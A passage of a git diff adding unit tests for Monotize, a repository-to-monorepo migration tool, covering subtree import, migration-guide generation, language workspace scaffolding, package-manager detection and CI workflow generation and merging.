expect(path.isAbsolute(plan.sourceRepo)).toBe(true); + expect(path.isAbsolute(plan.targetMonorepo)).toBe(true); + }); + + 
it('should include commit count in replay operation description', async () => { + const source = createGitRepo('source'); + const target = createGitRepo('target'); + const logger = mockLogger(); + + const plan = await generateBranchPlan('main', source, target, 'replay', logger); + + const formatPatch = plan.operations.find((o) => o.id === 'format-patch'); + expect(formatPatch?.description).toContain('commits'); + }); + }); + + describe('applyBranchPlan', () => { + it('should apply subtree import successfully', async () => { + const source = createGitRepo('source'); + const target = createGitRepo('target'); + const logger = mockLogger(); + + // Add more content to source + fs.writeFileSync(path.join(source, 'lib.ts'), 'export const lib = 1;'); + execSync('git add . && git commit -m "add lib"', { cwd: source, stdio: 'pipe' }); + + const plan = await generateBranchPlan('main', source, target, 'subtree', logger); + + await applyBranchPlan(plan, 'packages/source', logger); + + // Verify files were imported into the target subdirectory + expect(fs.existsSync(path.join(target, 'packages/source/README.md'))).toBe(true); + expect(fs.existsSync(path.join(target, 'packages/source/lib.ts'))).toBe(true); + + // Verify git history exists + const log = execSync('git log --oneline', { cwd: target, encoding: 'utf-8' }); + expect(log.trim().split('\n').length).toBeGreaterThanOrEqual(2); + }); + + it('should clean up remote after subtree import', async () => { + const source = createGitRepo('source'); + const target = createGitRepo('target'); + const logger = mockLogger(); + + const plan = await generateBranchPlan('main', source, target, 'subtree', logger); + await applyBranchPlan(plan, 'packages/source', logger); + + // Check that no monotize-import remotes remain + const remotes = execSync('git remote', { cwd: target, encoding: 'utf-8' }); + expect(remotes).not.toContain('monotize-import'); + }); + + it('should clean up remote even if subtree add fails', async () => { + const 
source = createGitRepo('source'); + const target = createGitRepo('target'); + const logger = mockLogger(); + + // Create a prefix that already exists to cause subtree add to fail + fs.ensureDirSync(path.join(target, 'packages/source')); + fs.writeFileSync(path.join(target, 'packages/source/conflict.txt'), 'conflict'); + execSync('git add . && git commit -m "conflict"', { cwd: target, stdio: 'pipe' }); + + const plan = await generateBranchPlan('main', source, target, 'subtree', logger); + + // Should throw but still clean up + await expect( + applyBranchPlan(plan, 'packages/source', logger), + ).rejects.toThrow(); + + // Remote should still be cleaned up + const remotes = execSync('git remote', { cwd: target, encoding: 'utf-8' }); + expect(remotes).not.toContain('monotize-import'); + }); + + it('should apply patch replay strategy with feature branch', async () => { + const source = createGitRepo('source-replay'); + const target = createGitRepo('target-replay'); + const logger = mockLogger(); + + // Create a feature branch on source with commits diverging from main + execSync('git checkout -b feature', { cwd: source, stdio: 'pipe' }); + fs.writeFileSync(path.join(source, 'feature.ts'), 'export const feature = true;'); + execSync('git add . && git commit -m "add feature"', { cwd: source, stdio: 'pipe' }); + fs.writeFileSync(path.join(source, 'feature2.ts'), 'export const feature2 = true;'); + execSync('git add . 
&& git commit -m "add feature2"', { cwd: source, stdio: 'pipe' }); + + const plan = await generateBranchPlan('feature', source, target, 'replay', logger); + + // The plan should reference the feature branch + expect(plan.strategy).toBe('replay'); + expect(plan.branch).toBe('feature'); + expect(plan.operations).toHaveLength(3); + expect(plan.dryRunReport!.commitCount).toBeGreaterThanOrEqual(2); + }); + + it('should handle replay when format-patch produces no patches', async () => { + const source = createGitRepo('source-nopatch'); + const target = createGitRepo('target-nopatch'); + const logger = mockLogger(); + + // Generate a replay plan for main (no divergent commits) + const plan = await generateBranchPlan('main', source, target, 'replay', logger); + + // Attempt to apply - git am with no patches may throw + try { + await applyBranchPlan(plan, 'packages/source', logger); + } catch { + // Expected: either no patches to apply or git am fails + } + + // Verify logger was called (the function at least started) + expect(logger.info).toHaveBeenCalled(); + }); + }); +}); diff --git a/tests/unit/strategies/migration-doc.test.ts b/tests/unit/strategies/migration-doc.test.ts new file mode 100644 index 0000000..d8184a7 --- /dev/null +++ b/tests/unit/strategies/migration-doc.test.ts @@ -0,0 +1,259 @@ +import { describe, it, expect } from 'vitest'; +import { generateMigrationDoc } from '../../../src/strategies/migration-doc.js'; +import type { AnalyzeResult, ExtendedAnalysis } from '../../../src/types/index.js'; + +function makeAnalysis(overrides: Partial<AnalyzeResult> = {}): AnalyzeResult { + return { + packages: [ + { name: 'pkg-a', version: '1.0.0', path: '/tmp/a', dependencies: {}, devDependencies: {}, scripts: {} }, + { name: 'pkg-b', version: '2.0.0', path: '/tmp/b', dependencies: {}, devDependencies: {}, scripts: {} }, + ], + conflicts: [], + collisions: [], + crossDependencies: [], + complexityScore: 25, + recommendations: [], + ...overrides, + }; +} + +function 
makeExtended(overrides: Partial<ExtendedAnalysis> = {}): ExtendedAnalysis { + return { + environment: [], + packageManager: [], + tooling: [], + ci: [], + publishing: [], + repoRisks: [], + riskSummary: { + classification: 'straightforward', + reasons: [], + topFindings: [], + }, + ...overrides, + }; +} + +describe('generateMigrationDoc', () => { + it('should generate a markdown document with header', () => { + const doc = generateMigrationDoc(makeAnalysis()); + expect(doc).toContain('# Migration Guide'); + expect(doc).toContain('Generated by Monotize'); + }); + + it('should include complexity section', () => { + const doc = generateMigrationDoc(makeAnalysis({ complexityScore: 42 })); + expect(doc).toContain('## Complexity'); + expect(doc).toContain('**Score:** 42/100'); + expect(doc).toContain('**Packages:** 2'); + }); + + it('should include conflict count', () => { + const doc = generateMigrationDoc(makeAnalysis({ + conflicts: [ + { name: 'lodash', versions: [{ version: '4.17.21', source: 'a', type: 'dependencies' }], severity: 'minor' }, + ], + })); + expect(doc).toContain('**Conflicts:** 1'); + }); + + it('should include collision count', () => { + const doc = generateMigrationDoc(makeAnalysis({ + collisions: [{ path: '.gitignore', sources: ['a', 'b'], suggestedStrategy: 'merge' }], + })); + expect(doc).toContain('**File Collisions:** 1'); + }); + + it('should include circular dependencies when present', () => { + const doc = generateMigrationDoc(makeAnalysis({ + circularDependencies: [{ packages: ['a', 'b'], cycle: ['a', 'b', 'a'] }], + })); + expect(doc).toContain('**Circular Dependencies:** 1'); + }); + + it('should include suggested order of operations', () => { + const doc = generateMigrationDoc(makeAnalysis()); + expect(doc).toContain('## Suggested Order of Operations'); + expect(doc).toContain('**Prepare**'); + expect(doc).toContain('**Verify**'); + expect(doc).toContain('**Archive**'); + }); + + it('should include recommendations when present', () => { + const doc = 
generateMigrationDoc(makeAnalysis({ + recommendations: ['Use pnpm for workspace management', 'Add shared tsconfig'], + })); + expect(doc).toContain('## Recommendations'); + expect(doc).toContain('Use pnpm for workspace management'); + expect(doc).toContain('Add shared tsconfig'); + }); + + it('should not include recommendations section when empty', () => { + const doc = generateMigrationDoc(makeAnalysis({ recommendations: [] })); + expect(doc).not.toContain('## Recommendations'); + }); + + describe('with extended analysis', () => { + it('should include risk assessment for straightforward classification', () => { + const doc = generateMigrationDoc(makeAnalysis(), makeExtended({ + riskSummary: { + classification: 'straightforward', + reasons: [], + topFindings: [], + }, + })); + expect(doc).toContain('## Risk Assessment'); + expect(doc).toContain('Straightforward'); + }); + + it('should include risk assessment for needs-decisions classification', () => { + const doc = generateMigrationDoc(makeAnalysis(), makeExtended({ + riskSummary: { + classification: 'needs-decisions', + reasons: ['Multiple CI systems detected'], + topFindings: [], + }, + })); + expect(doc).toContain('Needs Decisions'); + expect(doc).toContain('Multiple CI systems detected'); + }); + + it('should include risk assessment for complex classification', () => { + const doc = generateMigrationDoc(makeAnalysis(), makeExtended({ + riskSummary: { + classification: 'complex', + reasons: ['Submodules detected', 'LFS in use'], + topFindings: [], + }, + })); + expect(doc).toContain('Complex'); + expect(doc).toContain('Submodules detected'); + expect(doc).toContain('LFS in use'); + }); + + it('should include top risks with findings', () => { + const doc = generateMigrationDoc(makeAnalysis(), makeExtended({ + riskSummary: { + classification: 'complex', + reasons: [], + topFindings: [ + { + id: 'risk-submodules', + title: 'Git submodules detected', + severity: 'error', + confidence: 'high', + evidence: [{ path: 
'.gitmodules', snippet: 'submodule "lib"' }], + suggestedAction: 'Convert submodules to regular packages', + }, + ], + }, + })); + expect(doc).toContain('## Top Risks'); + expect(doc).toContain('### Git submodules detected'); + expect(doc).toContain('**Severity:** error'); + expect(doc).toContain('Convert submodules to regular packages'); + expect(doc).toContain('.gitmodules'); + }); + + it('should include top risks with evidence without snippet', () => { + const doc = generateMigrationDoc(makeAnalysis(), makeExtended({ + riskSummary: { + classification: 'complex', + reasons: [], + topFindings: [ + { + id: 'risk-large', + title: 'Large files detected', + severity: 'warn', + confidence: 'high', + evidence: [{ path: 'data/big-file.bin' }], + suggestedAction: 'Move to LFS', + }, + ], + }, + })); + expect(doc).toContain('data/big-file.bin'); + }); + + it('should include extended analysis sections with findings', () => { + const doc = generateMigrationDoc(makeAnalysis(), makeExtended({ + environment: [ + { + id: 'env-node-mismatch', + title: 'Node.js version mismatch', + severity: 'warn', + confidence: 'high', + evidence: [{ path: '.nvmrc' }], + suggestedAction: 'Standardize on Node 20', + }, + ], + ci: [ + { + id: 'ci-gh-actions', + title: 'GitHub Actions detected', + severity: 'info', + confidence: 'high', + evidence: [{ path: '.github/workflows/ci.yml' }], + suggestedAction: 'Merge workflows', + }, + ], + })); + expect(doc).toContain('## Environment'); + expect(doc).toContain('[!] Node.js version mismatch'); + expect(doc).toContain('Standardize on Node 20'); + expect(doc).toContain('## CI/CD'); + expect(doc).toContain('[i] GitHub Actions detected'); + }); + + it('should skip extended sections with no findings', () => { + const doc = generateMigrationDoc(makeAnalysis(), makeExtended({ + environment: [], + tooling: [], + })); + expect(doc).not.toContain('## Environment'); + expect(doc).not.toContain('## Tooling'); + }); + + it('should use !! 
icon for critical/error severity', () => { + const doc = generateMigrationDoc(makeAnalysis(), makeExtended({ + repoRisks: [ + { + id: 'risk-critical', + title: 'Critical risk', + severity: 'critical', + confidence: 'high', + evidence: [], + suggestedAction: 'Fix immediately', + }, + ], + })); + expect(doc).toContain('[!!] Critical risk'); + }); + }); + + describe('with findings and decisions', () => { + it('should include required decisions', () => { + const doc = generateMigrationDoc(makeAnalysis({ + findings: { + decisions: [ + { + kind: 'package-manager', + description: 'Choose package manager', + suggestedAction: 'Use pnpm', + }, + { + kind: 'conflict-strategy', + description: 'Resolve lodash version conflict', + }, + ], + conflictInsights: [], + collisionInsights: [], + }, + })); + expect(doc).toContain('## Required Decisions'); + expect(doc).toContain('**package-manager**: Choose package manager'); + expect(doc).toContain('Suggested: Use pnpm'); + expect(doc).toContain('**conflict-strategy**: Resolve lodash version conflict'); + }); + }); +}); diff --git a/tests/unit/strategies/multilang-scaffold.test.ts b/tests/unit/strategies/multilang-scaffold.test.ts new file mode 100755 index 0000000..a98ad1a --- /dev/null +++ b/tests/unit/strategies/multilang-scaffold.test.ts @@ -0,0 +1,222 @@ +import { describe, it, expect } from 'vitest'; +import { + scaffoldGoWorkspace, + scaffoldRustWorkspace, + generatePythonRecommendations, +} from '../../../src/strategies/multilang-scaffold.js'; +import type { LanguageDetection } from '../../../src/types/index.js'; + +describe('multilang-scaffold', () => { + describe('scaffoldGoWorkspace', () => { + it('should generate go.work with use directives', () => { + const detections: LanguageDetection[] = [ + { + repoName: 'svc-api', + languages: [{ name: 'go', markers: ['go.mod'], metadata: { module: 'github.com/example/svc-api' } }], + }, + { + repoName: 'svc-worker', + languages: [{ name: 'go', markers: ['go.mod'], metadata: { module: 
'github.com/example/svc-worker' } }], + }, + ]; + + const result = scaffoldGoWorkspace(detections, 'packages'); + + expect(result.relativePath).toBe('go.work'); + expect(result.content).toContain('go 1.21'); + expect(result.content).toContain('./packages/svc-api'); + expect(result.content).toContain('./packages/svc-worker'); + expect(result.content).toContain('use ('); + }); + + it('should generate go.work for a single module', () => { + const detections: LanguageDetection[] = [ + { + repoName: 'my-go-app', + languages: [{ name: 'go', markers: ['go.mod'] }], + }, + ]; + + const result = scaffoldGoWorkspace(detections, 'libs'); + + expect(result.relativePath).toBe('go.work'); + expect(result.content).toContain('./libs/my-go-app'); + }); + + it('should ignore non-Go languages', () => { + const detections: LanguageDetection[] = [ + { + repoName: 'go-svc', + languages: [{ name: 'go', markers: ['go.mod'] }], + }, + { + repoName: 'rust-lib', + languages: [{ name: 'rust', markers: ['Cargo.toml'] }], + }, + ]; + + const result = scaffoldGoWorkspace(detections, 'packages'); + + expect(result.content).toContain('./packages/go-svc'); + expect(result.content).not.toContain('rust-lib'); + }); + }); + + describe('scaffoldRustWorkspace', () => { + it('should generate workspace Cargo.toml with members', () => { + const detections: LanguageDetection[] = [ + { + repoName: 'crate-a', + languages: [{ name: 'rust', markers: ['Cargo.toml'], metadata: { crate: 'crate-a' } }], + }, + { + repoName: 'crate-b', + languages: [{ name: 'rust', markers: ['Cargo.toml'], metadata: { crate: 'crate-b' } }], + }, + ]; + + const result = scaffoldRustWorkspace(detections, 'packages'); + + expect(result.relativePath).toBe('Cargo.toml'); + expect(result.content).toContain('[workspace]'); + expect(result.content).toContain('"packages/crate-a"'); + expect(result.content).toContain('"packages/crate-b"'); + expect(result.content).toContain('members = ['); + }); + + it('should generate workspace Cargo.toml 
for a single crate', () => { + const detections: LanguageDetection[] = [ + { + repoName: 'my-lib', + languages: [{ name: 'rust', markers: ['Cargo.toml'] }], + }, + ]; + + const result = scaffoldRustWorkspace(detections, 'crates'); + + expect(result.relativePath).toBe('Cargo.toml'); + expect(result.content).toContain('"crates/my-lib"'); + }); + + it('should ignore non-Rust languages', () => { + const detections: LanguageDetection[] = [ + { + repoName: 'rust-svc', + languages: [{ name: 'rust', markers: ['Cargo.toml'] }], + }, + { + repoName: 'go-svc', + languages: [{ name: 'go', markers: ['go.mod'] }], + }, + ]; + + const result = scaffoldRustWorkspace(detections, 'packages'); + + expect(result.content).toContain('"packages/rust-svc"'); + expect(result.content).not.toContain('go-svc'); + }); + }); + + describe('generatePythonRecommendations', () => { + it('should recommend uv/poetry for pyproject.toml projects', () => { + const detections: LanguageDetection[] = [ + { + repoName: 'py-app', + languages: [{ name: 'python', markers: ['pyproject.toml'] }], + }, + ]; + + const findings = generatePythonRecommendations(detections); + + expect(findings).toHaveLength(1); + expect(findings[0].id).toBe('python-workspace-py-app'); + expect(findings[0].title).toContain('py-app'); + expect(findings[0].severity).toBe('info'); + expect(findings[0].confidence).toBe('high'); + expect(findings[0].evidence[0].path).toBe('pyproject.toml'); + expect(findings[0].suggestedAction).toContain('uv workspaces'); + }); + + it('should recommend migrating from requirements.txt', () => { + const detections: LanguageDetection[] = [ + { + repoName: 'legacy-py', + languages: [{ name: 'python', markers: ['requirements.txt'] }], + }, + ]; + + const findings = generatePythonRecommendations(detections); + + expect(findings).toHaveLength(1); + expect(findings[0].suggestedAction).toContain('migrating from requirements.txt'); + expect(findings[0].evidence[0].path).toBe('requirements.txt'); + }); + + it('should 
generate findings for multiple Python projects', () => { + const detections: LanguageDetection[] = [ + { + repoName: 'py-svc-1', + languages: [{ name: 'python', markers: ['pyproject.toml'] }], + }, + { + repoName: 'py-svc-2', + languages: [{ name: 'python', markers: ['requirements.txt'] }], + }, + ]; + + const findings = generatePythonRecommendations(detections); + + expect(findings).toHaveLength(2); + expect(findings[0].id).toBe('python-workspace-py-svc-1'); + expect(findings[1].id).toBe('python-workspace-py-svc-2'); + }); + + it('should ignore non-Python languages', () => { + const detections: LanguageDetection[] = [ + { + repoName: 'go-app', + languages: [{ name: 'go', markers: ['go.mod'] }], + }, + { + repoName: 'py-app', + languages: [{ name: 'python', markers: ['pyproject.toml'] }], + }, + ]; + + const findings = generatePythonRecommendations(detections); + + expect(findings).toHaveLength(1); + expect(findings[0].id).toBe('python-workspace-py-app'); + }); + + it('should return empty array when no Python projects exist', () => { + const detections: LanguageDetection[] = [ + { + repoName: 'go-app', + languages: [{ name: 'go', markers: ['go.mod'] }], + }, + ]; + + const findings = generatePythonRecommendations(detections); + + expect(findings).toHaveLength(0); + }); + + it('should handle multi-language repos with Python', () => { + const detections: LanguageDetection[] = [ + { + repoName: 'multi', + languages: [ + { name: 'go', markers: ['go.mod'] }, + { name: 'python', markers: ['pyproject.toml'] }, + ], + }, + ]; + + const findings = generatePythonRecommendations(detections); + + expect(findings).toHaveLength(1); + expect(findings[0].id).toBe('python-workspace-multi'); + }); + }); +}); diff --git a/tests/unit/strategies/package-manager.test.ts b/tests/unit/strategies/package-manager.test.ts index 3e4aa2f..4ee5534 100755 --- a/tests/unit/strategies/package-manager.test.ts +++ b/tests/unit/strategies/package-manager.test.ts @@ -1,4 +1,5 @@ import { describe, it, 
expect, vi, beforeEach, afterEach } from 'vitest'; +import path from 'node:path'; import { execFileSync } from 'node:child_process'; import { getPackageManagerVersion, @@ -11,6 +12,9 @@ import { getPackageManagerField, parsePackageManagerType, getPackageManagerDisplayName, + isYarnBerry, + detectPackageManager, + detectPackageManagerFromSources, } from '../../../src/strategies/package-manager.js'; // Mock execFileSync @@ -18,6 +22,15 @@ vi.mock('node:child_process', () => ({ execFileSync: vi.fn(), })); +// Mock pathExists from utils/fs +vi.mock('../../../src/utils/fs.js', async (importOriginal) => { + const orig = await importOriginal(); + return { + ...orig, + pathExists: vi.fn(), + }; +}); + describe('Package Manager Strategy', () => { beforeEach(() => { vi.resetAllMocks(); @@ -302,4 +315,155 @@ describe('Package Manager Strategy', () => { expect(getPackageManagerDisplayName('npm')).toBe('npm'); }); }); + + describe('isYarnBerry', () => { + it('should return true when .yarnrc.yml exists', async () => { + const { pathExists } = await import('../../../src/utils/fs.js'); + vi.mocked(pathExists).mockResolvedValue(true); + + const result = await isYarnBerry('/some/dir'); + expect(result).toBe(true); + }); + + it('should check yarn version when no .yarnrc.yml', async () => { + const { pathExists } = await import('../../../src/utils/fs.js'); + vi.mocked(pathExists).mockResolvedValue(false); + vi.mocked(execFileSync).mockReturnValue('4.1.0\n'); + + const result = await isYarnBerry('/some/dir'); + expect(result).toBe(true); + }); + + it('should return false for yarn classic version', async () => { + const { pathExists } = await import('../../../src/utils/fs.js'); + vi.mocked(pathExists).mockResolvedValue(false); + vi.mocked(execFileSync).mockReturnValue('1.22.22\n'); + + const result = await isYarnBerry('/some/dir'); + expect(result).toBe(false); + }); + + it('should return false when yarn is not installed and no dirPath', async () => { + 
vi.mocked(execFileSync).mockImplementation(() => { + throw new Error('Command not found'); + }); + + const result = await isYarnBerry(); + expect(result).toBe(false); + }); + + it('should return false when yarn is not installed with dirPath', async () => { + const { pathExists } = await import('../../../src/utils/fs.js'); + vi.mocked(pathExists).mockResolvedValue(false); + vi.mocked(execFileSync).mockImplementation(() => { + throw new Error('Command not found'); + }); + + const result = await isYarnBerry('/some/dir'); + expect(result).toBe(false); + }); + }); + + describe('detectPackageManager', () => { + it('should detect pnpm from lock file', async () => { + const { pathExists } = await import('../../../src/utils/fs.js'); + vi.mocked(pathExists).mockImplementation(async (p: string) => { + return p.endsWith('pnpm-lock.yaml'); + }); + + const result = await detectPackageManager('/some/dir'); + expect(result).toBe('pnpm'); + }); + + it('should detect yarn classic from lock file', async () => { + const { pathExists } = await import('../../../src/utils/fs.js'); + vi.mocked(pathExists).mockImplementation(async (p: string) => { + if (p.endsWith('yarn.lock')) return true; + if (p.endsWith('.yarnrc.yml')) return false; + return false; + }); + // Yarn classic version + vi.mocked(execFileSync).mockReturnValue('1.22.22\n'); + + const result = await detectPackageManager('/some/dir'); + expect(result).toBe('yarn'); + }); + + it('should detect yarn-berry from lock file + yarnrc', async () => { + const { pathExists } = await import('../../../src/utils/fs.js'); + vi.mocked(pathExists).mockImplementation(async (p: string) => { + if (p.endsWith('pnpm-lock.yaml')) return false; + if (p.endsWith('yarn.lock')) return true; + if (p.endsWith('.yarnrc.yml')) return true; + return false; + }); + + const result = await detectPackageManager('/some/dir'); + expect(result).toBe('yarn-berry'); + }); + + it('should detect npm from lock file', async () => { + const { pathExists } = await 
import('../../../src/utils/fs.js'); + vi.mocked(pathExists).mockImplementation(async (p: string) => { + return p.endsWith('package-lock.json'); + }); + + const result = await detectPackageManager('/some/dir'); + expect(result).toBe('npm'); + }); + + it('should return null when no lock files found', async () => { + const { pathExists } = await import('../../../src/utils/fs.js'); + vi.mocked(pathExists).mockResolvedValue(false); + + const result = await detectPackageManager('/some/dir'); + expect(result).toBeNull(); + }); + }); + + describe('detectPackageManagerFromSources', () => { + it('should return the most common package manager', async () => { + const { pathExists } = await import('../../../src/utils/fs.js'); + vi.mocked(pathExists).mockImplementation(async (p: string) => { + // All repos use pnpm + return p.endsWith('pnpm-lock.yaml'); + }); + + const result = await detectPackageManagerFromSources([ + { path: '/a', name: 'a' }, + { path: '/b', name: 'b' }, + { path: '/c', name: 'c' }, + ]); + expect(result).toBe('pnpm'); + }); + + it('should return null when no repos have lock files', async () => { + const { pathExists } = await import('../../../src/utils/fs.js'); + vi.mocked(pathExists).mockResolvedValue(false); + + const result = await detectPackageManagerFromSources([ + { path: '/a', name: 'a' }, + { path: '/b', name: 'b' }, + ]); + expect(result).toBeNull(); + }); + + it('should return the majority PM when mixed', async () => { + const { pathExists } = await import('../../../src/utils/fs.js'); + vi.mocked(pathExists).mockImplementation(async (p: string) => { + // Repo /a has pnpm, repo /b has npm, repo /c has pnpm + if (path.normalize(p) === path.normalize(path.join('/a', 'pnpm-lock.yaml'))) return true; + if (path.normalize(p) === path.normalize(path.join('/b', 'package-lock.json'))) return true; + if (path.normalize(p) === path.normalize(path.join('/c', 'pnpm-lock.yaml'))) return true; + return false; + }); + + const result = await 
detectPackageManagerFromSources([ + { path: '/a', name: 'a' }, + { path: '/b', name: 'b' }, + { path: '/c', name: 'c' }, + ]); + expect(result).toBe('pnpm'); + }); + }); }); diff --git a/tests/unit/strategies/workflow-generator.test.ts b/tests/unit/strategies/workflow-generator.test.ts new file mode 100755 index 0000000..61d444c --- /dev/null +++ b/tests/unit/strategies/workflow-generator.test.ts @@ -0,0 +1,199 @@ +import { describe, it, expect } from 'vitest'; +import { + generatePathFilteredWorkflow, + planLegacyWorkflowMoves, +} from '../../../src/strategies/workflow-generator.js'; + +describe('Workflow Generator', () => { + describe('generatePathFilteredWorkflow', () => { + it('should generate a workflow with default options', () => { + const result = generatePathFilteredWorkflow( + ['pkg-a', 'pkg-b'], + 'packages', + ); + + expect(result.relativePath).toBe('.github/workflows/monotize-ci.yml'); + expect(result.content).toContain('name: CI'); + expect(result.content).toContain('pkg-a'); + expect(result.content).toContain('pkg-b'); + }); + + it('should include package names in path filters', () => { + const result = generatePathFilteredWorkflow( + ['core', 'utils', 'cli'], + 'packages', + ); + + expect(result.content).toContain("- 'packages/core/**'"); + expect(result.content).toContain("- 'packages/utils/**'"); + expect(result.content).toContain("- 'packages/cli/**'"); + }); + + it('should use pnpm install by default', () => { + const result = generatePathFilteredWorkflow(['pkg-a'], 'packages'); + + expect(result.content).toContain('pnpm install --frozen-lockfile'); + }); + + it('should default to Node.js 20', () => { + const result = generatePathFilteredWorkflow(['pkg-a'], 'packages'); + + expect(result.content).toContain("node-version: '20'"); + }); + + it('should include pnpm setup step by default', () => { + const result = generatePathFilteredWorkflow(['pkg-a'], 'packages'); + + expect(result.content).toContain('Setup pnpm'); + 
expect(result.content).toContain('pnpm/action-setup@v4'); + }); + + it('should generate yarn install command when yarn is specified', () => { + const result = generatePathFilteredWorkflow(['pkg-a'], 'packages', { + packageManager: 'yarn', + }); + + expect(result.content).toContain('yarn install --frozen-lockfile'); + expect(result.content).not.toContain('pnpm install'); + }); + + it('should generate npm ci command when npm is specified', () => { + const result = generatePathFilteredWorkflow(['pkg-a'], 'packages', { + packageManager: 'npm', + }); + + expect(result.content).toContain('npm ci'); + expect(result.content).not.toContain('pnpm install'); + expect(result.content).not.toContain('yarn install'); + }); + + it('should not include pnpm setup step for non-pnpm managers', () => { + const result = generatePathFilteredWorkflow(['pkg-a'], 'packages', { + packageManager: 'yarn', + }); + + expect(result.content).not.toContain('Setup pnpm'); + expect(result.content).not.toContain('pnpm/action-setup@v4'); + }); + + it('should use custom Node.js version', () => { + const result = generatePathFilteredWorkflow(['pkg-a'], 'packages', { + nodeVersion: '18', + }); + + expect(result.content).toContain("node-version: '18'"); + expect(result.content).not.toContain("node-version: '20'"); + }); + + it('should use custom options together (yarn, node 18)', () => { + const result = generatePathFilteredWorkflow( + ['pkg-a', 'pkg-b'], + 'packages', + { packageManager: 'yarn', nodeVersion: '18' }, + ); + + expect(result.relativePath).toBe('.github/workflows/monotize-ci.yml'); + expect(result.content).toContain("node-version: '18'"); + expect(result.content).toContain('yarn install --frozen-lockfile'); + expect(result.content).toContain('yarn run build'); + expect(result.content).toContain('yarn run test'); + expect(result.content).not.toContain('Setup pnpm'); + }); + + it('should generate matrix includes for each package', () => { + const result = generatePathFilteredWorkflow( + ['api', 
'web', 'shared'], + 'packages', + ); + + expect(result.content).toContain('- package: api'); + expect(result.content).toContain('- package: web'); + expect(result.content).toContain('- package: shared'); + }); + + it('should generate detect-changes outputs for each package', () => { + const result = generatePathFilteredWorkflow( + ['pkg-a', 'pkg-b'], + 'packages', + ); + + expect(result.content).toContain('pkg-a: ${{ steps.filter.outputs.pkg-a }}'); + expect(result.content).toContain('pkg-b: ${{ steps.filter.outputs.pkg-b }}'); + }); + + it('should use custom packages directory in path filters', () => { + const result = generatePathFilteredWorkflow( + ['core'], + 'libs', + ); + + expect(result.content).toContain("- 'libs/core/**'"); + expect(result.content).not.toContain("- 'packages/core/**'"); + }); + + it('should handle a single package', () => { + const result = generatePathFilteredWorkflow(['solo'], 'packages'); + + expect(result.content).toContain("- 'packages/solo/**'"); + expect(result.content).toContain('- package: solo'); + }); + + it('should produce different install commands for each package manager', () => { + const pnpmResult = generatePathFilteredWorkflow(['pkg'], 'packages', { + packageManager: 'pnpm', + }); + const yarnResult = generatePathFilteredWorkflow(['pkg'], 'packages', { + packageManager: 'yarn', + }); + const npmResult = generatePathFilteredWorkflow(['pkg'], 'packages', { + packageManager: 'npm', + }); + + expect(pnpmResult.content).toContain('pnpm install --frozen-lockfile'); + expect(yarnResult.content).toContain('yarn install --frozen-lockfile'); + expect(npmResult.content).toContain('npm ci'); + + // All three should be different + expect(pnpmResult.content).not.toBe(yarnResult.content); + expect(yarnResult.content).not.toBe(npmResult.content); + expect(pnpmResult.content).not.toBe(npmResult.content); + }); + }); + + describe('planLegacyWorkflowMoves', () => { + it('should return correct from/to pairs for existing workflows', () => { + 
const moves = planLegacyWorkflowMoves(['ci.yml', 'deploy.yml']); + + expect(moves).toEqual([ + { from: '.github/workflows/ci.yml', to: '.github/workflows/legacy/ci.yml' }, + { from: '.github/workflows/deploy.yml', to: '.github/workflows/legacy/deploy.yml' }, + ]); + }); + + it('should handle a single workflow', () => { + const moves = planLegacyWorkflowMoves(['build.yml']); + + expect(moves).toHaveLength(1); + expect(moves[0]).toEqual({ + from: '.github/workflows/build.yml', + to: '.github/workflows/legacy/build.yml', + }); + }); + + it('should return an empty array when no workflows exist', () => { + const moves = planLegacyWorkflowMoves([]); + + expect(moves).toEqual([]); + }); + + it('should preserve original filenames in the legacy directory', () => { + const moves = planLegacyWorkflowMoves(['test.yml', 'lint.yml', 'release.yml']); + + expect(moves).toHaveLength(3); + for (const move of moves) { + const filename = move.from.split('/').pop(); + expect(move.to).toBe(`.github/workflows/legacy/${filename}`); + } + }); + }); +}); diff --git a/tests/unit/strategies/workflow-merge.test.ts b/tests/unit/strategies/workflow-merge.test.ts index 1819d69..53ea39e 100644 --- a/tests/unit/strategies/workflow-merge.test.ts +++ b/tests/unit/strategies/workflow-merge.test.ts @@ -5,6 +5,7 @@ import os from 'node:os'; import crypto from 'node:crypto'; import { mergeWorkflows, + mergeWorkflowsToFiles, analyzeWorkflows, } from '../../../src/strategies/workflow-merge.js'; @@ -95,6 +96,71 @@ jobs: expect(result.totalWorkflows).toBe(0); expect(result.workflowsByRepo['no-workflow']).toEqual([]); }); + + it('should detect array triggers (on: [push, pull_request])', async () => { + const repo = await createRepoWithWorkflow( + 'repo-array-trigger', + `name: CI +on: [push, pull_request] +jobs: + test: + runs-on: ubuntu-latest +` + ); + + const result = await analyzeWorkflows([{ path: repo, name: 'repo-array-trigger' }]); + + expect(result.commonTriggers).toContain('push'); + 
expect(result.commonTriggers).toContain('pull_request'); + }); + + it('should detect string trigger (on: push)', async () => { + const repo = await createRepoWithWorkflow( + 'repo-string-trigger', + `name: CI +on: push +jobs: + test: + runs-on: ubuntu-latest +` + ); + + const result = await analyzeWorkflows([{ path: repo, name: 'repo-string-trigger' }]); + + expect(result.commonTriggers).toContain('push'); + }); + + it('should handle malformed YAML gracefully', async () => { + const repoPath = path.join(tempDir, 'repo-malformed-yaml'); + const workflowDir = path.join(repoPath, '.github', 'workflows'); + await fs.ensureDir(workflowDir); + await fs.writeFile(path.join(workflowDir, 'ci.yml'), ': : : invalid yaml {{{'); + + const result = await analyzeWorkflows([{ path: repoPath, name: 'repo-malformed-yaml' }]); + + expect(result.totalWorkflows).toBe(1); + expect(result.workflowsByRepo['repo-malformed-yaml']).toContain('ci.yml'); + }); + + it('should not report conflicts when filenames differ', async () => { + const repo1Path = path.join(tempDir, 'repo-diff1'); + const wf1 = path.join(repo1Path, '.github', 'workflows'); + await fs.ensureDir(wf1); + await fs.writeFile(path.join(wf1, 'build.yml'), 'name: Build\non: push'); + + const repo2Path = path.join(tempDir, 'repo-diff2'); + const wf2 = path.join(repo2Path, '.github', 'workflows'); + await fs.ensureDir(wf2); + await fs.writeFile(path.join(wf2, 'test.yml'), 'name: Test\non: push'); + + const result = await analyzeWorkflows([ + { path: repo1Path, name: 'repo-diff1' }, + { path: repo2Path, name: 'repo-diff2' }, + ]); + + expect(result.conflicts).toEqual([]); + expect(result.totalWorkflows).toBe(2); + }); }); describe('mergeWorkflows', () => { @@ -269,5 +335,222 @@ jobs: const workflowDir = path.join(outputDir, '.github', 'workflows'); expect(await fs.pathExists(workflowDir)).toBe(false); }); + + it('should merge env vars from multiple workflows', async () => { + const repo1 = await createRepoWithWorkflow( + 
